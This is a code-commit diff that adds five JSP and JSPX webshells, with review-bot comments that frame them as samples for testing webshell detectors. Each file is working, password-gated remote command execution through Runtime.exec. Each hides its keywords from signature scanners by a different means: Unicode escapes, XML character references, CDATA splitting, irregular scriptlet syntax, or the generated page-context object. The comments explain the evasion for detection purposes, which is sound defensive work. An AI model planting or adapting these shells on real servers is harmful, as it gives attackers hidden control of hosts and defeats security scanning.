add webshell 24-28
fa1c0n1 committed Sep 20, 2020
1 parent d1db7d2 commit 9f0582a
Showing 5 changed files with 99 additions and 0 deletions.
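--- /dev/null
+++ b/web/webshell24.jsp
@@ -0,0 +1,17 @@
+<%@ page import="java.io.InputStream" %>
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+
+<%--经过Unicode编码的webshell--%>
+<%
+\u0069\u0066\u0020\u0028"shaqima"\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028"ladypwd"\u0029\u0029\u0029\u0020\u007b
+\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0020\u0069\u006e\u0020\u003d\u0020\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028"infocmd"\u0029\u002e\u0073\u0070\u006c\u0069\u0074\u0028" "\u0029\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u003b
+\u0069\u006e\u0074\u0020\u0072\u0065\u0074\u0020\u003d\u0020\u002d\u0031\u003b
+\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0062\u0073\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0062\u0079\u0074\u0065\u005b\u0032\u0030\u0034\u0038\u005d\u003b
+\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u0028"<pre>"\u0029\u003b
+\u0077\u0068\u0069\u006c\u0065\u0028\u0028\u0072\u0065\u0074\u0020\u003d\u0020\u0069\u006e\u002e\u0072\u0065\u0061\u0064\u0028\u0062\u0073\u0029\u0029\u0020\u0021\u003d\u0020\u002d\u0031\u0029\u0020\u007b
+\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u006c\u006e\u0028\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0062\u0073\u0029\u0029\u003b
+\u007d
+\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u0028"</pre>"\u0029\u003b
+\u007d
+%>
+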
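Review bot: The header comment `<%--经过Unicode编码的webshell--%>` is the sample's only documentation and is not in English, so a reader of a detection test corpus cannot see at a glance what this file exercises. A replacement such as `<%-- Sample: scriptlet body written as Java \uXXXX escapes; the compiler decodes them before lexing, so a scanner must do the same before matching keywords --%>` states both the technique and the normalization a detector needs. The other four files in this commit carry equally terse non-English comments and should be translated the same way.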
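--- /dev/null
+++ b/web/webshell25.jspx
@@ -0,0 +1,18 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml" version="2.0">
+<!--对危险函数进行HTML实体编码的webshell-->
+<jsp:directive.page contentType="text/html" pageEncoding="UTF-8"/>
+<jsp:directive.page import="java.io.InputStream"/>
+<pre>
+<jsp:scriptlet>
+if ("shaqima".equals(request.getParameter("ladypwd"))) {
+&#x49;&#x6e;&#x70;&#x75;&#x74;&#x53;&#x74;&#x72;&#x65;&#x61;&#x6d;&#x20;&#x69;&#x6e;&#x20;&#x3d;&#x20;&#x52;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x2e;&#x67;&#x65;&#x74;&#x52;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x28;&#x29;&#x2e;&#x65;&#x78;&#x65;&#x63;&#x28;&#x72;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x2e;&#x67;&#x65;&#x74;&#x50;&#x61;&#x72;&#x61;&#x6d;&#x65;&#x74;&#x65;&#x72;&#x28;&#x22;&#x63;&#x6d;&#x64;&#x22;&#x29;&#x2e;&#x73;&#x70;&#x6c;&#x69;&#x74;&#x28;&#x22;&#x20;&#x22;&#x29;&#x29;&#x2e;&#x67;&#x65;&#x74;&#x49;&#x6e;&#x70;&#x75;&#x74;&#x53;&#x74;&#x72;&#x65;&#x61;&#x6d;&#x28;&#x29;&#x3b;
+int ret = -1;
+byte[] bs = new byte[2048];
+while((ret = in.read(bs)) != -1) {
+out.println(new String(bs));
+}
+}
+</jsp:scriptlet>
+</pre>
+</jsp:root>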
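Review bot: The comment `<!--对危险函数进行HTML实体编码的webshell-->` should say in English what the encoded scriptlet line relies on: in a .jspx file the scriptlet is XML text, so the `&#x..;` character references are resolved by the XML parser before any Java source exists, and a scanner that matches on raw file bytes sees no method call. A header such as `<!-- Sample: scriptlet encoded as XML character references; normalize XML text (references and CDATA sections) before signature matching -->` gives a detection suite the check it needs. webshell26.jspx in this commit makes the same point with CDATA sections in place of character references, and its comment should be updated in the same way.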
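--- /dev/null
+++ b/web/webshell26.jspx
@@ -0,0 +1,18 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml" version="2.0">
+<jsp:directive.page contentType="text/html" pageEncoding="UTF-8"/>
+<jsp:directive.page import="java.io.InputStream"/>
+<!--使用![CDATA[ ]]> 对危险函数关键字拆分的webshell-->
+<pre>
+<jsp:scriptlet>
+if ("shaqima".equals(request.getParameter("ladypwd"))) {
+InputStream in = Run<![CDATA[time.get]]>Run<![CDATA[time]]>().ex<![CDATA[ec(request.get]]>Parameter("cmd").split(" ")).getInputStream();
+int ret = -1;
+byte[] bs = new byte[2048];
+while((ret = in.read(bs)) != -1) {
+out.println(new String(bs));
+}
+}
+</jsp:scriptlet>
+</pre>
+</jsp:root>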
29 changes: 29 additions & 0 deletions web/webshell27.jsp
@@ -0,0 +1,29 @@
<%@ page import="java.io.InputStream" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%--利用不规则的JSP语法实现的webshell--%>
<%
String ladypwd = request.getParameter("ladypwd");
String cmd = request.getParameter("cmd");
setmode(out, ladypwd, cmd);
}catch(Throwable t) {} finally {_jspxFactory.releasePageContext(_jspx_page_context);}
}
public void setmode(JspWriter myout, String ladypwd, String cmd) throws Exception {
javax.servlet.jsp.JspWriter out = null;
javax.servlet.jsp.JspWriter _jspx_out = null;
javax.servlet.jsp.PageContext _jspx_page_context = null;
javax.servlet.http.HttpServletResponse response = null;
try {
if ("shaqima".equals(ladypwd)) {
InputStream in = Runtime.getRuntime().exec(cmd.split(" ")).getInputStream();
int ret = -1;
byte[] bs = new byte[2048];
myout.print("<pre>");
while((ret = in.read(bs)) != -1) {
myout.println(new String(bs));
}
myout.print("</pre>");
}
%>

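Review bot: The comment `<%--利用不规则的JSP语法实现的webshell--%>` should be in English and should name what the sample depends on: the scriptlet closes the generated `_jspService()` body itself on the `}catch(Throwable t) {} finally {_jspxFactory.releasePageContext(_jspx_page_context);}` line and then declares `setmode`, whose `try {` is never closed anywhere in the file, so the page only compiles if the JSP compiler's generated epilogue has exactly that shape — presumably tied to one compiler's output. A header such as `<%-- Sample: irregular JSP syntax; the scriptlet completes the generated _jspService() and opens a method that the compiler's generated tail must close, so it depends on the generated-code layout --%>` records this. The section header counts 29 additions but 27 lines render here, so two lines (likely blank) are not visible on this page.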
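--- /dev/null
+++ b/web/webshell28.jsp
@@ -0,0 +1,17 @@
+<%@ page import="java.io.InputStream" %>
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<%--使用一些特殊的JSP内置对象实现的webshell--%>
+<%
+if ("shaqima".equals(_jspx_page_context.getRequest().getParameter("ladypwd"))) {
+InputStream in = Runtime.getRuntime().exec(_jspx_page_context.getRequest().getParameter("cmd").split(" ")).getInputStream();
+int ret = -1;
+byte[] bs = new byte[2048];
+out.print("<pre>");
+while((ret = in.read(bs)) != -1) {
+out.println(new String(bs));
+}
+out.print("</pre>");
+}
+%>
+
+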
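Review bot: The comment `<%--使用一些特殊的JSP内置对象实现的webshell--%>` should state in English which object is used and why it matters for detection: both `getParameter` calls go through `_jspx_page_context.getRequest()`, a local that appears to come from the JSP compiler's generated servlet rather than the `request` implicit object, so signatures anchored on `request.getParameter` do not match while the `Runtime.getRuntime().exec` sink is written in plain text. Suggested header: `<%-- Sample: request reached through the generated _jspx_page_context local instead of the request implicit object; detectors should key on the exec sink rather than the parameter source --%>`. `_jspx_page_context` is not one of the JSP specification's implicit objects, so whether it resolves depends on the container's compiler — worth confirming in the comment.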